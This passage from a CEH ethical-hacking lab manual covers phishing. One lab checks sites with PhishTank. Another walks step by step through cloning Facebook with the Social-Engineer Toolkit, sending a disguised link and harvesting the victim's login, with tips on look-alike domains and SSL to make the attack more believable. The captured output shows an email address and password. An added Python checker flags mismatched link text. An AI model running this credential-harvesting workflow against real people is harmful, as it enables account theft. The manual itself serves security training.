  • 13. Module 09 - Social Engineering your responsibility to educate em ployees 011 best practices for protecting inform ation. Phishing sites 01‫־‬ emails can be reported to plusl11ng-report@ us-cert.gov http: / / w w w .us-cert.gov/ 11a v /re p o rt p h 1sh111g.htm l U S-C E R T (U nited States C om puter Em ergency Readiness Team ) is collecting phishing email m essages and w ebsite locations so that they can help people avoid becom ing victim s o f phishing scams. Lab Objectives [CTTools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 09 Social Engineering This lab will show you how to use phishing sites using a w eb brow ser. It will teach you how to: ■ D etect phishing sites ■ P rotect the netw ork from phishing attacks Lab Environment T o carry out the lab you need: ■ A com puter running W indow s Server 2012 ■ A w eb brow ser (Firefox, Internet Explorer, etc.) w ith Internet access Lab Duration Tune: 10 Minutes Overview of PhiskTank £ Q PhishTank URL: PhishTank is a free community site w here anyone can submit, verify, track, and h ttp .//www.phishtank.com s!1are phishing data. PhishTank is a collaborative clearing house for data and inform ation regarding phishing 011 the Internet. Also, PhishTank provides an open API tor developers and researchers to integrate anti-phishing data into their applications at 110 charge. Lab Tasks 1. T o start this lab you need to launch a w eb brow ser first. 111 this lab we have used Mozilla Firefox. 2. Launch the Start m enu by hovering the m ouse cursor 011 the low er-left corner o f desktop. m. T A S K 1 PhishTank Ethical H acking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.] C EH Lab M anual Page 686
  • 14. Module 09 - Social Engineering
FIGURE 2.1: Windows Server 2012-Start Menu
3. Click the Mozilla Firefox app to launch the browser.
FIGURE 2.2: Windows Server 2012-Start Menu Apps view
4. Type http://www.phishtank.com in the address bar of the web browser and press Enter.
5. You will see the following:
FIGURE 2.3: Welcome screen of PhishTank
PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.
  • 15. Module 09 - Social Engineering
6. Type the website URL to be checked for phishing, for example, http://sdapld21.host21.com.
7. Click Is it a phish?.
FIGURE 2.4: Checking for site
PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.
If the site is a phishing site, you see the following warning dialog box.
FIGURE 2.5: Warning dialog for phishing site
Lab Analysis
Document all the websites and verify whether they are phishing sites.
OpenDNS is interested in having the best available information about phishing websites.
Tool/Utility: PhishTank
Information Collected/Objectives Achieved:
■ Phishing site detected
  • 16. Module 09 - Social Engineering
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?
Internet Connection Required: ☑ Yes □ No
Platform Supported: ☑ Classroom □ iLabs
  • 17. Module 09 - Social Engineering
Social Engineering Penetration Testing using Social Engineering Toolkit (SET)
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.
Lab Scenario
Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available with underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages and attach malicious files and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once.
Though numerous sorts of attacks can be performed using this toolkit, this is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community.
As an ethical hacker, penetration tester, or security administrator, you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.
Lab Objectives
The objective of this lab is to help students learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester method
■ Generate reports for conducted penetration tests
  • 18. Module 09 - Social Engineering
Lab Environment
To carry out the lab, you need:
■ Run this tool in BackTrack Virtual Machine
■ Web browser with Internet access
■ Administrative privileges to run tools
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering
Lab Duration
Time: 10 Minutes
Overview of Social Engineering Toolkit
Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. The (SET) is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.
Lab Tasks
TASK 1: Execute Social Engineering Toolkit
1. Log in to your BackTrack virtual machine.
2. Select Applications → BackTrack → Exploitation Tools → Social Engineering Tools → Social Engineering Toolkit and click Set.
FIGURE 3.1: Launching SET in BackTrack
  • 19. Module 09 - Social Engineering
3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service.
FIGURE 3.2: SET Service Agreement option
4. You will be presented with a list of menus to select the task. Type 1 and press Enter to select the Social-Engineering Attacks option.
FIGURE 3.3: SET Main menu
5. A list of menus in Social-Engineering Attacks will appear; type 2 and press Enter to select Website Attack Vectors.
SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.
The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site.
SET allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.
  • 20. Module 09 - Social Engineering
FIGURE 3.4: Social Engineering Attacks menu
6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.
FIGURE 3.5: website Attack Vectors menu
7. Now, type 2 and press Enter to select the Site Cloner option from the menu.
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
  • 21. Module 09 - Social Engineering
The Site Cloner is used to clone a website of your choice.
FIGURE 3.6: Credential Harvester Attack menu
8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.
FIGURE 3.7: Providing IP address in Harvester/Tabnabbing
9. Now, you will be prompted for a URL to be cloned; type the desired URL for Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.
The tabnabbing attack method is used when a victim has multiple tabs open; when the user clicks the link, the victim will be presented with a “Please wait while the page loads”. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.
  • 22. Module 09 - Social Engineering
FIGURE 3.8: Providing URL to be cloned
10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.
11. It will start Credential Harvester.
FIGURE 3.9: SET Website Cloning
12. Leave the Credential Harvester Attack to fetch information from the victim’s machine.
The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.
If you’re doing a penetration test, register a name that’s similar to the victim, for Gmail you could do gmail.com (notice the 1), something similar that can mistake the user into thinking it’s the legitimate
  • 23. Module 09 - Social Engineering
FIGURE 3.10: SET Credential Harvester Attack
13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her to click to browse the IP address.
14. For this demo, launch your web browser in the BackTrack machine; launch your favorite email service. In this example we have used www.gmail.com. Login to your gmail account and compose an email.
FIGURE 3.11: Composing email in Gmail
15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.
When you hover over the link, the URL will be presented with the real URL, not the attacker’s machine. So for example if you’re cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious Webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.
Most of the time they won’t even notice the IP but it’s just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.
  • 24. Module 09 - Social Engineering
FIGURE 3.12: Linking Fake URL to Actual URL
16. In the Edit Link window, first type the actual address in the Web address field under the Link to option and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and text to display is www.facebook.com/Rini TGIF. Click OK.
FIGURE 3.13: Edit Link window
17. The fake URL should appear in the email body, as shown in the following screenshot.
  • 25. Module 09 - Social Engineering
FIGURE 3.14: Adding Fake URL in the email content
18. To verify that the fake URL is linked to the actual URL, click the fake URL and it will display the actual URL as Go to link: with the actual URL. Send the email to the intended user.
FIGURE 3.15: Actual URL linked to Fake URL
19. When the victim clicks the URL, he or she will be presented with a replica of Facebook.com.
20. The victim will be enticed to enter his or her user name and password into the form fields as it appears to be a genuine website. When the victim enters the Username and Password and clicks Log In, it does not allow logging in; instead, it redirects to the legitimate Facebook login page. Observe the URL in the browser.
In some cases when you’re performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website
  • 26. Module 09 - Social Engineering
FIGURE 3.16: Fake and Legitimate Facebook login page
21. As soon as the victim types in the email address and password, the SET Terminal in BackTrack fetches the typed user name and password, which can be used by an attacker to gain unauthorized access to the victim’s account.
The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can’t utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.
The multi attack vector utilizes each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When you’re finished be sure to select the 'I’m finished' option.
  • 27. Module 09 - Social Engineering
FIGURE 3.17: SET found Username and Password
22. Press CTRL+C to generate a report for this attack performed.
FIGURE 3.18: Generating Reports through SET
Social Engineer Toolkit Mass E-Mailer: There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.
The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
Lab Analysis
Analyze and document the results related to the lab exercise.
  • 28. Module 09 - Social Engineering
Tool/Utility: Social Engineering Toolkit
Information Collected/Objectives Achieved:
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,',€,',
PARAM: timezone=-540
PARAM: lgnrnd=224034_ArYA
PARAM: lgnjs=n
email=samchoang@yahoo.com
pass=test@123
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Evaluate each of the following Paros proxy options:
a. Trap Request
b. Trap Response
c. Continue button
d. Drop button
Internet Connection Required: ☑ Yes □ No
Platform Supported: ☑ Classroom □ iLabs
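The link built in steps 16 to 18 of the SET lab shows one host in its visible text (www.facebook.com) while its target is a bare IP address (http://10.0.0.15), and that mismatch can be checked for mechanically in a mail filter or when reviewing a reported message. The following Python is an added example, not part of the lab manual or of SET; the names audit_links and AnchorCollector and the sample message are constructed for illustration, and the first sample link reuses the lab's own values.

```python
"""Flag links in an HTML email whose visible text names one host while the
href points somewhere else, or at a bare IP address."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A hostname-looking token in visible link text, e.g. "www.facebook.com/...".
# Heuristic: a file name such as "report.pdf" also matches and needs review.
HOST_IN_TEXT = re.compile(r"((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)


class AnchorCollector(HTMLParser):
    """Collect (href, visible_text) for every <a>, including nested markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            # Join fragments split by inline tags, then collapse whitespace.
            text = " ".join("".join(self._text).split())
            self.links.append((self._href, text))
            self._href = None


def _normalize(host):
    host = (host or "").lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def audit_links(html_body):
    """Return findings as dicts with the href, the visible text and reasons."""
    parser = AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        try:
            parts = urlsplit(href)
            href_host = _normalize(parts.hostname)
        except ValueError:
            findings.append({"href": href, "text": text,
                             "reasons": ["unparseable-href"]})
            continue
        if parts.scheme not in ("http", "https"):
            continue  # mailto:, in-page anchors etc. are out of scope here
        reasons = []
        if _is_ip(href_host):
            reasons.append("href-is-ip-literal")
        shown = HOST_IN_TEXT.search(text)
        if shown:
            shown_host = _normalize(shown.group(1))
            # Equal, or a subdomain on a label boundary; a target host that
            # merely begins with the shown name does not pass.
            same = (href_host == shown_host
                    or href_host.endswith("." + shown_host))
            if not same:
                reasons.append(
                    f"text-shows-{shown_host}-but-href-is-{href_host}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample body; the first link reuses the lab's example values.
SAMPLE_EMAIL = """\
<p>Hello Sam,</p>
<p>Please click this link
<a href="http://10.0.0.15"><b>www.facebook.com</b>/Rini TGIF</a>
to view the weekend party pictures.</p>
<p>Help pages: <a href="https://www.example.org/help">www.example.org/help</a></p>
<p><a href="https://intranet.example.org/">Open the staff portal</a></p>
"""

if __name__ == "__main__":
    for finding in audit_links(SAMPLE_EMAIL):
        print(finding["href"], "|", finding["text"], "|",
              ", ".join(finding["reasons"]))
```

Link text that names no host ("Open the staff portal") cannot be compared against its target, so only the IP-literal check applies to it.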